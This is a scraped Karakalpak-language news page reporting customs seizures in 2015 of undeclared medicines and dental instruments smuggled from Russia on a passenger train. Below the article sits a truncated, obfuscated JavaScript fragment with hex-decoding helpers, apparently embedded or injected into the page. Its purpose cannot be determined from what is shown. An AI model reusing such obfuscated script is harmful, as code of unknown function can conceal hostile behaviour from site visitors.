Еркин Қарақалпақстан Вести Каракалпакстана 22:17:45, 11.11.2019
Хош келипсиз! | RSS
Сайт мазмуны

Кириў усылы

САПАСЫЗ ДӘРИ-ДӘРМАҚЛАРДЫҢ

НЫЗАМСЫЗ АЙЛАНЫСЫНЫҢ АЛДЫ АЛЫНБАҚТА

Қарақалпақстан Рсепубликасы Бажыхана басқармасы бас­қа ҳуқық қорғаў уйымлары менен биргеликте республикамыз аймағына материаллық товар байлықлар, әсиресе, контрафакт ҳәм сапасыз дәри-дәрмақлар, ҳәм медициналық буйымлардың нызамсыз алып кирилиўи, ишки аймақларға тасылыўы, сақланыўы, сатылыўының алдын алыўға қаратылған қатар илажлар алып бармақта. Ҳәзирги күнлери шет еллерге жумыс ислеўге кеткен пуқараларымыз тәрепинен сапасы кепилленбеген дәри-дәрмақларды, медициналық буйымларды алып келиў жағдайлары жүз бермекте.

Мәселен, 2015-жыл 23-июль күни басқарма хызметкерлери басқа ҳуқық қорғаў уйымы ўәкиллери менен биргеликте «Қарақалпақстан» шегара темир жол бәндиргисине келген 324-санлы «Волгоград-Ташкент» жолаўшы поезды бажыхана қадағалаўынан өткерилгенде 11-вагонында киятырған елимиз пуқарасы Олимов Жамшид бажыхана декларациясында жазып көрсет­пестен купениң жоқары бөлегинен ҳәм өзи менен алып киятырған «Grundig» маркалы алдын ислетилген телевизор ишине бөлип-бөлип жасырған, жарамлылығын тастыйықлаўшы ҳеш қандай ҳүжжети болмаған ҳәр бири 3 мг болған 475    ампула «Альтевир», ҳәр бири 5 мг болған 25 ампула «Альтевир» ҳәм ҳәр бири 200 мг болған 100 қуты «Рибавирин С3» атлы дәри-дәрмақларды Россия Федерациясынан республикамызға нызамға қылап рәўиште алып кириўге урынғанлықта айып қо­йылды.

Суд уйымы тәрепинен Ж.Олимовқа жәрийма жазасы тайынланып, ҳүжжетлестирип алынған дәри өнимлери ти­йисли тәртипте жоқ етилди.

Сондай-ақ, 2015-жыл 3-сентябрь күни усы жөнелистеги жолаўшы поездының бақлаўшысы, Өзбекистан Республикасы пуқарасы Каримов Абдиховиз жолаўшы бажыхана декларациясында жазып көрсетпестен, жарамлылығын тастыйықлаўшы ҳеш қандай ҳүжжети болмаған 50 дана «Наконечники трубинные НТС 30005М4», 48 дана «Сплав легкоплавный», 2000 дана «Пульпоэкстракторы», 20 дана «Припой серебрянный ПСрМЦ-37 для пайки деталей зубных протезов», 2 дана «Гемостаб» жидкость для остановки капиллярных кровотечений Уе S94», 1044 дана «Головка алмазная «АГРИ», 120 конвалютада «Пульпоэкс­тракторы», 675 дана «Боры зубные твердосплавные 500.314.012.006.012», 800 дана «Анкерные штифты марок S2, S3, M1, М2, М3, L1, L2», 810 дана «Боры стоматологические» ҳәм 250 дана «Сверлы для точилки зубных мест» атлы, улыўма баҳасы 14202381 сумлық тис емлеўде пайдаланатуғын медициналық асбап-үскенелерди Россия Федерациясынан елимизге нызамға қайшы рәўиште алып өтиўге урынғанда иркилди.

Суд уйымы тәрепинен А.Каримовқа жәрийма жазасы та­йынланды ҳәм алынған затлардың сыпатына кепиллик бериўши тийисли жуўмақ алынғаннан кейин мәмлекет пайдасына өткерилди.

Б.ҚУРБАНОВ.

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "erkinkarakalpak.uz"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e

 

Излеў

Көп оқылған мақалалар

Сыбайлас сайтлар

Қарақалпақстан Республикасы Жоқарғы Кеңеси ҳәм Министрлер Кеңесиниң газеталары.
Қарақалпақстан баспасөз ҳәм хабар агентлигинде 2007-жыл 7-февральда дизимге алынған. Гүўалық № 01-001
Developed by TUIT NF